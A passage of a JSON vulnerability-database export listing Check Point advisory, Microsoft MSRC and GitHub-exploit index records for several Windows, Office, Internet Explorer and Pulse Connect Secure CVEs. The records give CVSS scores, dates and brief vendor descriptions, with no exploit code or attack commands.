Successful exploitation of this vulnerability would allow a remote attacker to obtain sensitive information.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-06-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Information Disclosure (CVE-2021-31955)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0316", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-02-16T19:34:24", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows NTFS Elevation of Privilege (CVE-2021-31956)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2021-06-08T00:00:00", "id": "CPAI-2021-0318", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-03T16:09:29", "description": "An authentication bypass vulnerability exists in Pulse Connect Secure. 
Successful exploitation of this vulnerability could allow a remote attacker to gain unauthorized access to the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-03T00:00:00", "type": "checkpoint_advisories", "title": "Pulse Connect Secure Authentication Bypass (CVE-2021-22893)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22893"], "modified": "2022-04-03T00:00:00", "id": "CPAI-2021-0877", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:39:14", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. 
An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-16T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows Kernel Elevation of Privilege (CVE-2020-0986)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986"], "modified": "2020-06-16T00:00:00", "id": "CPAI-2020-0521", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-21T18:44:23", "description": "A remote code execution vulnerability exists in Microsoft Outlook. The vulnerability is due to the way that Microsoft Outlook parses specially crafted email messages. 
Successful exploitation of this vulnerability may result to take control of an affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Outlook Remote Code Execution (CVE-2017-0199)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2022-11-21T00:00:00", "id": "CPAI-2017-0251", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:38:23", "description": "A memory corruption vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-11T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2020-1380)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380"], "modified": "2020-08-11T00:00:00", "id": "CPAI-2020-0727", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:34:15", "description": "An elevation of privilege vulnerability exists in Microsoft Windows. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Win32k Elevation of Privilege (CVE-2021-1732)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732"], "modified": "2021-02-09T00:00:00", "id": "CPAI-2021-0032", "href": "", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-03-17T02:34:11", "description": "Windows Kernel Information Disclosure Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows Kernel Information 
Disclosure Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31955", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31955", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-17T02:34:11", "description": "Windows NTFS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Windows NTFS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], 
"modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31956", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31956", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:35:19", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nTo exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application to take control of an affected system.\n\nThe update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-06-09T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0986"], "modified": 
"2020-06-09T07:00:00", "id": "MS:CVE-2020-0986", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0986", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:35:24", "description": "A remote code execution vulnerability exists in the way that Microsoft Office and WordPad parse specially crafted files. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nExploitation of this vulnerability requires that a user open or preview a specially crafted file with an affected version of Microsoft Office or WordPad. In an email attack scenario, an attacker could exploit the vulnerability by sending a specially crafted file to the user and then convincing the user to open the file.\n\nThe update addresses the vulnerability by correcting the way that Microsoft Office and WordPad parses specially crafted files, and by enabling API functionality in Windows that Microsoft Office and WordPad will leverage to resolve the identified issue.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-11T07:00:00", "type": "mscve", "title": "Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199"], "modified": "2017-09-13T07:00:00", "id": "MS:CVE-2017-0199", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:34:29", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-27072.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-13T07:00:00", "id": "MS:CVE-2021-28310", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28310", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:34:31", 
"description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-28310.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27072", "CVE-2021-28310"], "modified": "2021-04-13T07:00:00", "id": "MS:CVE-2021-27072", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27072", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-17T02:35:17", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. 
If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-08-11T07:00:00", "type": "mscve", "title": "Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380"], "modified": "2020-08-11T07:00:00", "id": "MS:CVE-2020-1380", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1380", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-03-17T02:34:47", "description": "Windows Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-1698.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-09T08:00:00", "type": "mscve", "title": "Windows Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1698", "CVE-2021-1732"], "modified": "2021-04-06T07:00:00", "id": "MS:CVE-2021-1732", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1732", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "githubexploit": [{"lastseen": "2022-04-29T09:12:19", "description": "# CVE-2021-31955 Windows Kernel Informati...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": 
"HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-26T03:59:38", "type": "githubexploit", "title": "Exploit for Exposure of Sensitive Information to an Unauthorized Actor in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31955"], "modified": "2022-04-29T01:39:44", "id": "399B15EF-A742-5722-86D2-59F3580C307B", "href": "", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2023-01-16T09:15:22", "description": "Working in WIN10...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-11T16:03:38", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2023-01-16T07:11:35", "id": "82A7AD32-D5F8-59E5-AC8B-6B99F9E33F64", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-12-18T16:20:07", "description": "# CVE-2021-31956\n\npretty stable exploit on win10 20h2 ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-02T10:35:11", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31956"], "modified": "2022-12-18T14:15:35", "id": "ACB6F5C0-7366-5D78-A7CE-F7ABD8C63974", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-01-31T15:21:32", "description": "# 
